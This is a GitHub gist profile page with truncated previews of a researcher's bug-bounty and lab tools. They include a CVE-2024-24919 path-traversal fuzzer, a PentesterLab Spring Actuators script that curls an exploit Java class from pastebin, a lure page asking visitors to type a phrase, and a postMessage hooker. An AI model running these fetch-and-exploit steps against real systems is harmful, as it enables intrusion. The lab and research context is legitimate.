Skip to content

Instantly share code, notes, and snippets.

View YasserGersy's full-sized avatar

YasserGersy

169 followers · 83 following
View GitHub Profile
@YasserGersy
YasserGersy / HackeroneAuto.py
Last active July 2, 2024 10:59
Get Hackerone programs and assets
import requests,os,base64
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Edit hacker and token with your handle and api token , or create auth.txt including this format username:token
list_my_programs=False
bounty_only=True
scope_only=True
hacker=''
token=''
@YasserGersy
YasserGersy / CVE-2024-24919.auto.py
Created May 31, 2024 07:17
fuzz your subdomains list against checkpoint path traversal
import sys,re
import requests
import concurrent.futures
import threading
import os
import requests
import socket
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from termcolor import colored
@YasserGersy
YasserGersy / Reader.py
Created May 14, 2022 03:59
Python script to search for specific strings in big files
#!/bin/python -e
import sys,os,glob,time
errors_count=0
max_id=100011265576762
debug=False
start=time.time()
def GetSecondsPassed():
global start
end=time.time()
@YasserGersy
YasserGersy / pentesterlab.com___spring-actuators.sh
Created October 7, 2020 21:42
https://pentesterlab.com/exercises/spring-actuators commands
mkdir src
mkdir src/META-INF
mkdir src/META-INF/services
curl https://pastebin.com/raw/XbCvxXT6 -o src/ExploitScriptEngineFactory.java
echo 'ExploitScriptEngineFactory' > src/META-INF/services/javax.script.ScriptEngineFactory
docker run -it -v `pwd`:/code openjdk /bin/bash
cd /code
javac -source 1.8 -target 1.8 src/ExploitScriptEngineFactory.java
@YasserGersy
YasserGersy / index.html
Created June 21, 2019 10:22
// source https://jsbin.com
<html>
<meta name="referrer" content="unsafe-url">
<body onload="f()">
<a href="" id="h"> home </a><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<div id="div1">
</div>
</hr><p style="float:left;">Type</p> <p style="color:green;padding-left : 20px;float:left;" >win-a-bicycle</p> <p style="padding-left : 20px;float:left;">in the two boxes and click enter</p><br/><img src="http://tiny.cc/img3" />
@YasserGersy
YasserGersy / Post.Message.html
Last active August 14, 2024 21:31
Post Message Hooker
<!DOCTYPE html>
<!-- Author Yasser Gersy @yassergersy v 2 -->
<html>
<head>
<meta charset="utf-8">
</head>
<script>
var last_message='';
var rcvd_msg_count=-2;
@YasserGersy
YasserGersy / pythphp_get_func_names.py
Created November 19, 2018 14:49
Get List of php and python functions
import requests
r=requests.get('http://php.net/manual/en/indexes.functions.php')
res=""
for p in r.text.encode('utf-8').split('<a href="'):
if p.startswith('function'):
z=(p.split('"')[0].split('function.')[1]).replace('-','_')[0:-4]
res=res+z+"\r"
open('php_fun_names.txt','w').write(res)
@YasserGersy
YasserGersy / dirlister.py
Created July 9, 2018 23:35
Find directory listing in websites using wfuzz
import sys,os,requests
print """
____________________________________________________
Dir listing finder
usage python dirlister.py domains_path list_path
requirements wfuzz , python-requests
_____________________________________________________
"""
@YasserGersy
YasserGersy / H1LP.py
Last active November 19, 2018 14:54
H1LP.py loads hackerone open programs
#!/bin/python
import requests
try:
requests.packages.urllib3.disable_warnings()
except:
print 'Error'
print 'Hackerone programs loader'
print '--------------------------------------------------------'
@YasserGersy
YasserGersy / HackthisSite_realistic_6.py
Last active November 19, 2018 14:55
HackthisSite realistic 6
def most_common(lst):
return max(set(lst), key=lst.count)
def stripme(d):
z=''
for c in d:
if c in '0123456789':
z=z+c
return z